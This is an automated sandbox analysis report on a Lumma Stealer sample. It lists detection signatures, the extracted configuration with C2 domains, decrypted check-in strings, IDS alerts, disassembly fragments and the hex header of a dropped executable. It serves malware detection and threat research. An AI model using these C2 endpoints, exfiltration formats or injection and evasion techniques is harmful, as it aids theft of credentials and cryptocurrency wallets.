Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1519693
MD5: a2b2889063a7a3f9785253f937ee6fe4
SHA1: f3499e38acaf1837c7b3d7289dd6627f5f7b3e3f
SHA256: e2a2430866d3186a75e84da8443e4b306aaa91527e4e8856c1a7f7e217aade81
Tags: exeuser-Bitsight
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Contains functionality to prevent local Windows debugging
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Source: reinforcenh.shop Avira URL Cloud: Label: malware
Source: stogeneratmns.shop Avira URL Cloud: Label: malware
Source: https://gutterydhowi.shop/api Avira URL Cloud: Label: malware
Source: https://drawzhotdog.shop/api Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/ Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/apiB Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api Avira URL Cloud: Label: malware
Source: ghostreedmnu.shop Avira URL Cloud: Label: malware
Source: https://ballotnwu.site/api Avira URL Cloud: Label: malware
Source: https://ptramidermsnqj.shop/api Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/ Avira URL Cloud: Label: malware
Source: ptramidermsnqj.shop Avira URL Cloud: Label: malware
Source: https://vozmeatillu.shop/api Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/api Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/api Avira URL Cloud: Label: malware
Source: fragnantbui.shop Avira URL Cloud: Label: malware
Source: https://fragnantbui.shop/api Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/api Avira URL Cloud: Label: malware
Source: gutterydhowi.shop Avira URL Cloud: Label: malware
Source: drawzhotdog.shop Avira URL Cloud: Label: malware
Source: https://ptramidermsnqj.shop/llh Avira URL Cloud: Label: malware
Source: offensivedzvju.shop Avira URL Cloud: Label: malware
Source: vozmeatillu.shop Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll Avira: detection malicious, Label: HEUR/AGEN.1300034
Found malware configuration
Source: 5.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["ptramidermsnqj.shop", "reinforcenh.shop", "gutterydhowi.shop", "stogeneratmns.shop", "vozmeatillu.shop", "offensivedzvju.shop", "fragnantbui.shop", "ghostreedmnu.shop", "drawzhotdog.shop"], "Build id": "LPnhqo--zdexodnebqjx"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: reinforcenh.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: stogeneratmns.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: fragnantbui.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: drawzhotdog.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: vozmeatillu.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: offensivedzvju.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: ghostreedmnu.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: gutterydhowi.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: ptramidermsnqj.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: LPnhqo--zdexodnebqjx
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.83.105:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\source\repos\Increase\Increase\obj\Release\net8.0\win-x86\linked\Increase.pdbSHA256 source: file.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: file.exe
Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.pdb source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\source\repos\Increase\Increase\obj\Release\net8.0\win-x86\linked\Increase.pdb source: file.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: file.exe

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then bound esi, dword ptr [ecx] 0_2_05445600
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then bound esi, dword ptr [ecx] 0_2_054455F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+3Ch] 5_2_0041050F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_00446791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 2EE0190Fh 5_2_00446791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_004469D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 2EE0190Fh 5_2_004469D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h 5_2_004469D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+14h] 5_2_00446BA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0040CED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 5_2_0041D060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+00000660h] 5_2_0041D060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov esi, dword ptr [esp+10h] 5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 5_2_0044A0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_004280A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_004200B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], dx 5_2_004200B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_00430250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0042F320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 5_2_004153FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 5_2_00448390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 5_2_0040F4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0040F4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 5_2_0041A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+00000660h] 5_2_0041E576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, word ptr [ecx+eax] 5_2_0041E576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h 5_2_0041E576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 5_2_00426530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp ecx 5_2_0043F530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ebx+eax], 00000000h 5_2_0042E638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp ecx 5_2_0043F762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 5_2_00443760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then push edi 5_2_0041D791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_004267B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh 5_2_004478C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ebx, ecx 5_2_004138C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 5_2_004448D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_004448D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_004288E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_0043A950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ebx, ecx 5_2_004139AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, eax 5_2_004139AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp eax 5_2_004139AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then dec ebx 5_2_0043E9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+3Ch] 5_2_00410A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_00404AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx ecx, word ptr [edi+eax] 5_2_00447AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 5_2_00405B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+14h] 5_2_00446BA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+14h] 5_2_00446C72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 5_2_0042BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 5_2_0042BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp eax 5_2_00448C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [ebx], ax 5_2_0042EC9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 5_2_00449DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+00000100h] 5_2_0041FE7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 5_2_00443E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 5_2_00428EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+000001C0h] 5_2_00412EBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 5_2_00406F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 5_2_00440F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 5_2_00449F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp ecx 5_2_0043EF7E

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:57092 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:57422 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:54684 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:64256 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:60410 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49733 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:50375 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:52826 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:49736 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.4.136:443
Source: Network traffic Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:49739 -> 172.67.208.139:443
Source: Network traffic Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:49734 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:64591 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 104.21.2.13:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 172.67.208.139:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.2.13:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 172.67.208.139:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.83.105:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.83.105:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.4.136:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.4.136:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.97.3:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: ptramidermsnqj.shop
Source: Malware configuration extractor URLs: reinforcenh.shop
Source: Malware configuration extractor URLs: gutterydhowi.shop
Source: Malware configuration extractor URLs: stogeneratmns.shop
Source: Malware configuration extractor URLs: vozmeatillu.shop
Source: Malware configuration extractor URLs: offensivedzvju.shop
Source: Malware configuration extractor URLs: fragnantbui.shop
Source: Malware configuration extractor URLs: ghostreedmnu.shop
Source: Malware configuration extractor URLs: drawzhotdog.shop
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 19:06:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 26 Sep 2024 14:25:26 GMTETag: "f4800-6230682795730"Accept-Ranges: bytesContent-Length: 1001472Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 55 7d 8f a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 3c 0f 00 00 0a 00 00 00 00 00 00 de 5a 0f 00 00 20 00 00 00 60 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 5a 0f 00 57 00 00 00 00 60 0f 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 3a 0f 00 00 20 00 00 00 3c 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 36 06 00 00 00 60 0f 00 00 08 00 00 00 3e 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0f 00 00 02 00 00 00 46 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 5a 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 00 22 00 00 84 38 0f 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 